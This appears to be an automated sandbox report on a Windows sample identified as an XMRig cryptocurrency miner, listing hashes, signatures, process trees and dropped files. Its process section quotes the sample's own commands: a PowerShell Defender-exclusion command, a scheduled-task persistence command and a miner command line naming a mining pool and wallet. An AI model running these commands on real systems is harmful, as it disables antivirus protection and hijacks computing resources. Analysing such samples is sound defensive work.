Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
06/03/2024, 22:46
240306-2pzx2abc39 723/12/2022, 20:25
221223-y7mhwahb34 1023/12/2022, 20:11
221223-yx8ncscc9x 1023/12/2022, 20:03
221223-ys7v9sha97 10Analysis
-
max time kernel
600s -
max time network
552s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23/12/2022, 20:25
Static task
static1
Behavioral task
behavioral1
Sample
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Resource
win7-20221111-en
General
-
Target
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
-
Size
2.1MB
-
MD5
55a350a007f6943a7e09f4abfdfa6979
-
SHA1
c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
-
SHA256
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
-
SHA512
707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
-
SSDEEP
49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/1456-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1456-161-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1456-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1456-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1456-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1456-170-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 3944 HMHM.exe 2492 HMHM.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation HMHM.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4596 set thread context of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3324 4596 WerFault.exe 80 4960 3944 WerFault.exe 109 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1888 schtasks.exe 3008 schtasks.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings mspaint.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings mspaint.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4608 powershell.exe 4608 powershell.exe 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 4472 mspaint.exe 4472 mspaint.exe 5096 mspaint.exe 5096 mspaint.exe 3944 HMHM.exe 3972 powershell.exe 3972 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeLockMemoryPrivilege 1456 vbc.exe Token: SeLockMemoryPrivilege 1456 vbc.exe Token: SeDebugPrivilege 3944 HMHM.exe Token: SeDebugPrivilege 3972 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1456 vbc.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4472 mspaint.exe 5096 mspaint.exe 2128 OpenWith.exe 3616 OpenWith.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 4596 wrote to memory of 4608 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 82 PID 4596 wrote to memory of 4608 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 82 PID 4596 wrote to memory of 3312 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 93 PID 4596 wrote to memory of 3312 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 93 PID 3312 wrote to memory of 1888 3312 cmd.exe 95 PID 3312 wrote to memory of 1888 3312 cmd.exe 95 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 4596 wrote to memory of 1456 4596 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 98 PID 3944 wrote to memory of 3972 3944 HMHM.exe 110 PID 3944 wrote to memory of 3972 3944 HMHM.exe 110 PID 3944 wrote to memory of 4956 3944 HMHM.exe 112 PID 3944 wrote to memory of 4956 3944 HMHM.exe 112 PID 4956 wrote to memory of 3008 4956 cmd.exe 118 PID 4956 wrote to memory of 3008 4956 cmd.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:1888
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1456
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4596 -s 16322⤵
- Program crash
PID:3324
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4252
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\ProgramData\screen.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc1⤵
- Drops file in System32 directory
PID:3068
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2128
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\ProgramData\screen.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5096
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3616
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 4596 -ip 45961⤵PID:728
-
C:\ProgramData\edge\HMHM.exeC:\ProgramData\edge\HMHM.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:3008
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3944 -s 18042⤵
- Program crash
PID:4960
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3944 -ip 39441⤵PID:3236
-
C:\ProgramData\edge\HMHM.exeC:\ProgramData\edge\HMHM.exe1⤵
- Executes dropped EXE
PID:2492
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
643.0MB
MD5434dc352dd7d67447a7654f5e2f0b926
SHA181fb6b7124a975574ff3d04c9f526d1df2040108
SHA25665135968c98b5eab524026e1d20bbe8c7f95be359f078004904daaf535d8b23a
SHA512158e15191f49b153308b5a20c0ccefc1ce21e481569e2258338b5aa5baf1ec88438328666d34482301ed41f2ab6fa9bfaa249c9b8b5bd0365152ec9db0617a2d
-
Filesize
643.0MB
MD5434dc352dd7d67447a7654f5e2f0b926
SHA181fb6b7124a975574ff3d04c9f526d1df2040108
SHA25665135968c98b5eab524026e1d20bbe8c7f95be359f078004904daaf535d8b23a
SHA512158e15191f49b153308b5a20c0ccefc1ce21e481569e2258338b5aa5baf1ec88438328666d34482301ed41f2ab6fa9bfaa249c9b8b5bd0365152ec9db0617a2d
-
Filesize
9.8MB
MD56ae02dd17c77c99b974b3910f0b38347
SHA1aba54e7b2c07b2424fe1f16f6668d5a919292877
SHA256d709d5274d388265c614f75419b89ca5e3f908209f26d62e48b9a0286772bee7
SHA512726afa7204e33c85e81f1b7666d52c05e0f548fc57b70b1aa92d7f81d3b7d1da9e77086d23a36703e029c643743372df7bf75fe6779a21c89ec8422c30fc972d
-
Filesize
135KB
MD5a6ffd274cae002bfa277e631623bea7d
SHA1cd55f04ee3525b3f39a4db60cafea55ba1ac7421
SHA25669b56ec351690b018e7431b8a45034e0398f8aea5d18b1cd5a9254af8d109594
SHA5120eeebe2a3c1cff323633bc86e7e7965b533a28d7e6ddb165f58da7a39a509f7ec16e051b88ef2b248e75a6788810efa79f3ade403db7413a719e345abcae52c0
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406